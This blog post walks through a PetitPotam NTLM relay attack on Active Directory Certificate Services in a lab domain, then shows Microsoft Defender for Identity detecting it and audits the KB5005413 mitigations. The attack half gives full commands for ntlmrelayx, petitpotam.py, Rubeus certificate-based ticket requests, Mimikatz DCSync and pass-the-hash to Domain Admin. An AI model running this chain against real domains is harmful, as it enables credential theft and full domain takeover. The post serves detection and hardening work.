PetitPotam…from attack to detection via Microsoft Defender for Identity (MDI)

PetitPotam is an NTLM relay attack on Active Directory Certificate Services (AD CS) HTTP endpoints. If the following AD CA services are installed, the Active Directory environment is vulnerable to the attack.

See KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) for more information on how to mitigate it.

The attack

The Domain Controllers have the latest Microsoft 365 Defender for Identity (MDI) sensors installed.

PSPKIAudit

Import-Module .\PSPKIAudit.psm1
Invoke-PKIAudit -CAComputerName WSRV2016-DC01.s3cur1ty.local

PetitPotam

An attacker can target a Domain Controller (WSRV2016-DC02; 192.168.178.11) and relay the DC's NTLM credentials to the Active Directory Certificate Services (AD CA) web enrollment pages to enroll a certificate for the DC machine account.

NTLMRelayx

Keep in mind that the --adcs option comes from a pull request that has to be applied to Impacket before it can be used to exploit the AD CS weakness (the '--adcs' option is not available in the latest released version of Impacket).

python3 ntlmrelayx.py -t http://192.168.178.10/certsrv/certfnsh.asp -smb2support --adcs

After ntlmrelayx is started, run PetitPotam (from the example above) against the second domain controller (WSRV2016-DC02), which then sends its machine account credentials to the Kali Linux host.

python3 petitpotam.py 192.168.178.49 192.168.178.11

Authentication to http://192.168.178.10 as S3CUR1TY/WSRV2016-DC02$ succeeds, a CSR is generated, and a Base64-encoded certificate is issued for the user S3CUR1TY/WSRV2016-DC02$.

We can see the issued certificate in the Certification Authority console on the AD CA.

Rubeus

Rubeus.exe asktgt /user:WSRV2016-DC02$ /certificate:<base64-certificate> /ptt

Keep in mind to use the latest version of Rubeus, which supports the /certificate parameter.

With klist we can see the cached Kerberos ticket(s) on the local machine; as the ticket is for the DC machine account, it carries the privileges required for DCSync.

MimiKatz — DCSync

lsadump::dcsync /domain:s3cur1ty.local /all /csv

The output includes the NTLM hash of a Domain Admin account (RID 512, i.e. the SID ends with 512), e.g. Administrator in our example.

MimiKatz — Pass the hash

Before pass-the-hash (PTH) we don't have access to the Domain Controller.

privilege::debug
sekurlsa::pth /user:Administrator /domain:s3cur1ty.local /ntlm:6cff5d10edb2c4…

The resulting command prompt (cmd.exe) runs with Domain Admin privileges and we can access the Domain Controller.

And …GAME OVER :-)

Microsoft Defender for Identity

Microsoft Defender for Identity version 2.158.14362 detects the PetitPotam attack on Active Directory Certificate Services. The alert is "Suspicious network connection over Encrypting File System Remote Protocol".

The DCSync attack is also detected by Microsoft Defender for Identity.

Microsoft 365 Defender

Microsoft 365 Defender provides a protection layer (IPC, MDI, MDE, MDO & MCAS) over all assets of the Modern Workplace (Identity, Devices, Apps & Data).

Defense in depth and zero trust are the most practical approach against new (0-day) attacks, even when some detection capabilities are not yet implemented.

Mitigation

Or remove the Certificate Enrollment Web Service completely if not required.
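As an added example (not code from the original post), the following PowerShell audits the KB5005413 hardening on the AD CS web enrollment server: Extended Protection for Authentication must be Required, SSL must be required, and NTLM should no longer be offered as an IIS authentication provider. It assumes the WebAdministration module is available on the AD CS server and that the enrollment application lives at the default path 'Default Web Site/CertSrv'; both are assumptions, not facts from the post.

```powershell
# Added example: audit the KB5005413 NTLM relay mitigations on the CertSrv IIS application.
# Assumptions: run locally on the AD CS web enrollment server with the WebAdministration
# module, default site/application path 'Default Web Site/CertSrv'.
Import-Module WebAdministration

function Get-IisAttributeValue {
    # Get-WebConfigurationProperty returns either a raw value or a ConfigurationAttribute
    # object with a .Value member, depending on the attribute type; normalise both.
    param([string]$PSPath, [string]$Filter, [string]$Name)
    $v = Get-WebConfigurationProperty -PSPath $PSPath -Filter $Filter -Name $Name
    if ($null -ne $v -and $v.PSObject.Properties['Value']) { return $v.Value }
    return $v
}

function Test-CertSrvNtlmRelayHardening {
    param(
        [string]$Site = 'Default Web Site',
        [string]$App  = 'CertSrv'
    )
    $psPath  = "IIS:\Sites\$Site\$App"
    $winAuth = 'system.webServer/security/authentication/windowsAuthentication'

    # 1. Extended Protection for Authentication (EPA): KB5005413 requires tokenChecking = Require,
    #    which binds the NTLM authentication to the TLS channel so a relayed handshake is rejected.
    $epa   = [string](Get-IisAttributeValue $psPath "$winAuth/extendedProtection" 'tokenChecking')
    $epaOk = ($epa -eq 'Require')

    # 2. EPA only works over TLS, so the application must require SSL (sslFlags contains 'Ssl').
    $sslFlags = [string](Get-IisAttributeValue $psPath 'system.webServer/security/access' 'sslFlags')
    $sslOk    = ($sslFlags -match 'Ssl')

    # 3. Authentication providers: the KB additionally recommends disabling NTLM for IIS on the
    #    AD CS server, so an 'NTLM' entry in the providers collection is flagged (Negotiate stays).
    $providers = @(Get-WebConfigurationProperty -PSPath $psPath -Filter "$winAuth/providers" -Name Collection |
        ForEach-Object { $_.value })
    $ntlmOk = -not ($providers -contains 'NTLM')

    [pscustomobject]@{
        Application          = "$Site/$App"
        ExtendedProtection   = $epa        # expected: Require
        ExtendedProtectionOk = $epaOk
        SslFlags             = $sslFlags   # expected: contains Ssl
        RequireSslOk         = $sslOk
        Providers            = ($providers -join ', ')
        NtlmDisabledOk       = $ntlmOk
        Hardened             = ($epaOk -and $sslOk -and $ntlmOk)
    }
}

Test-CertSrvNtlmRelayHardening | Format-List
```

Run the same function with -App 'CertSrv' replaced by the CES/CEP application names if those role services are installed, since KB5005413 applies the same settings to them.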

Chief Technology Officer @ Nedscaper